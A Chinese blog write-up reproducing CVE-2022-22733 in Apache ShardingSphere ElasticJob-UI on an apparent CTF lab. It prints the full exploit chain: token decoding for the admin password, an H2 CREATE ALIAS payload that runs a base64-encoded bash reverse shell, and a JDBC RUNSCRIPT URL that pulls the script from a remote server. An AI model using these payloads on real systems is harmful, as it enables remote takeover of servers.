【CVE-2022-22733漏洞复现】

最新推荐文章于 2024-07-24 10:39:17 发布
最新推荐文章于 2024-07-24 10:39:17 发布
阅读量1k 收藏 8
点赞数 10
分类专栏: 技术研究 渗透测试 文章标签: apache 漏洞复现 CVE-2022-22733 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30817059/article/details/135733642
版权

Apache ShardingSphere ElasticJob-UI漏洞 漏洞编号:CVE-2022-22733

文档说明

本文作者:SwBack
创作时间:2024/1/21 19:19:19
知乎:https://www.zhihu.com/people/back-88-87
CSDN:https://blog.csdn.net/qq_30817059
百度搜索: SwBack

漏洞描述

Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。

影响版本

Apache ShardingSphere ElasticJob-UI v3.0.0 及之前的版本

漏洞原理

Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。

具体漏洞原理可以参考这篇文章

https://www.shangyexinzhi.com/article/4555060.html

漏洞复现

抓取token

通过burp进行登录请求抓包

采用游客账号guest guest

在这里插入图片描述

在这里插入图片描述

base64解密token

利用burp自带的解密直接base64解密token,获得账号密码均为root

在这里插入图片描述

构造恶意代码

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "Q";}';CALL EXEC ('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvMTExMTEgMD4mMQ==}|{base64,-d}|{bash,-i}')

其中YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvMTExMTEgMD4mMQ==为反弹shell base64加密代码。

解码之后为bash -i >& /dev/tcp/111.111.111.111/11111 0>&1

格式为:bash -i >& /dev/tcp/IP/PORT 0>&1

上传攻击服务器

将恶意代码保存为poc.sql,并在本地开启一个web服务,将恶意文件放到web目录下

在这里插入图片描述

访问测试:

在这里插入图片描述

攻击服务器开启监听

在这里插入图片描述

上传恶意文件

使用之前解密得到的root账号密码登录进系统。

访问Event trace data source -> +ADD

其中Name Username Password 随意

Driver 选择 org.h2.Driver

url 构造如下

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://ip:port/poc.sql

这里的IP:PORT 为poc.sql 所在的web地址

例如我这里为

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://ae59ad7a-70b7-4ff7-9721-45e96b5b1f21.node5.buuoj.cn:81/poc.sql'

如图所示

在这里插入图片描述

点击Test connect 连接成功

在这里插入图片描述

可以看到存在漏洞的服务器已经访问了我们放置POC 的地址。

在这里插入图片描述

成功反弹shell

在这里插入图片描述

在根目录发现flag.

在这里插入图片描述

复现总结

这个漏洞复现并不难,其中遇到的几个问题,.

一个是因为服务器防火墙问题导致一直无法访问.关闭防火墙即可。

还有一个是poc的代码复制时将CREATE 复制为了REATE 导致无法反弹shell。

需要细心检查一下

原创申明

本文由SwBack 原创文章, 如有问题,欢迎指正。

SwBack
关注
专栏目录
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云镜 CVE-2022-22733
qq_22002773的博客
07-20 605
春秋云镜 CVE-2022-22733
[春秋云镜]CVE-2022-22733
niubi707的博客
12-04 6312
春秋云镜CVE-2022-22733Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。
Apache ShardingSphere ElasticJob-UI敏感信息泄漏到RCE(CVE-2022-22733
最新发布
qq_23003811的博客
07-24 256
Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。2、使用用户密码guest/guest登录,抓包返回管理员账号密码root/root。5、把shell.sql传到自己的vps服务器,并开启临时http服务。1、登录框账号密码爆破,获得普通用户密码guest/guest。7、在后台传shell,点击Test connect测试连接。
【春秋云镜】CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2405
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
【春秋云境】CVE-2022-22733靶场WP
果粒程
12-07 1684
【春秋云境】CVE-2022-22733靶场WP
CVE-2022-22733
sinat_25635183的博客
04-14 850
如果来到这里没有任何头绪的,可以回到漏洞的介绍那里,提到了,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。2、通过BP的抓包发现,在响应信息里出现了Token,根据前面漏洞得知,在Token中是包含有管理员的密码,因此,可以尝试破解密文。3、base64解码的方法有很多,这里尝试了两种,这一种是利用在线的工具进行解码,这类型的网站一大堆,可以根据个人的喜好进行选择;总之,渗透测试是一项高度专业和敏感的活动,必须由经验丰富的专业人士在合适的环境和条件下进行。
timeout of 10000ms exceeded 原因及解决方案
wangmj518的专栏
03-12 5291
原本正常的get请求,在修改完数据后,重新查询,前端提示 timeout of 10000ms exceeded。
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
2022-安询杯-复盘
Luodehahajiang的博客
01-06 376
漏洞是由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。导出HTTP对象后,按大小排序,发现一个secret.zip,导出来。压缩包里有625张黑白照片,25*25,一个二维码。官方wp给的复现CVE-2022-22733漏洞。将二进制文件转为十六进制,再保存为压缩包。html直接用wbstego4解密。base64解密得到管理员密码。里面是一个html,需要密码。
【春秋云镜】CVE-2024-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
2401_84240369的博客
04-11 3572
都没反应,guest用户没权限增加什么东西,那怎么办,进行不下去了,哦,他说返回token中,到这页面没变化,没有法和服务器交互,那肯定就没有返回值了,唯一有交互的地方就是guest/guest登录界面有交互,抓包!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
Centos7服务器同步网络发现漏洞与修复手册(每周更新3次)_cve-2024-2828
m0_62261166的博客
04-17 950
建议受影响的用户升级Apache Commons FileUpload到 1.5 或更高版本,参考链接:https://commons.apache.org/proper/commons-fileupload/download_fileupload.cgi。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
Openssl漏洞CVE-2022-2274)修复步骤实施手册
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-09 2567
基于近期护网要求安全核查,环境中发现涉及OpenSSL RSA存在远程代码执行漏洞漏洞编号为:CVE-2022-2274,受影响版本OpenSSL
spring漏洞复现cve-2022-22947,cve-2022-22963,cve-2022-22965)
qq_57939909的博客
08-30 1353
spring漏洞复现
swagger-ui漏洞利用
09-16
Swagger UI漏洞利用主要是指在使用Swagger UI时,可能存在未授权访问漏洞。通过Swagger UI,攻击者可以遍历所有API接口,自动填充参数并尝试进行GET/POST请求,以获取响应代码、Content-Type和Content-Length等信息,从而判断接口是否可以未授权访问。此外,还可以通过访问/trace路径来查看历史的HTTP请求消息,其中可能包含用户的token和cookie等敏感信息。如果在请求数据中存在token,且在访问界面时可以看到敏感数据,则可以判断存在未授权访问漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SwBack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值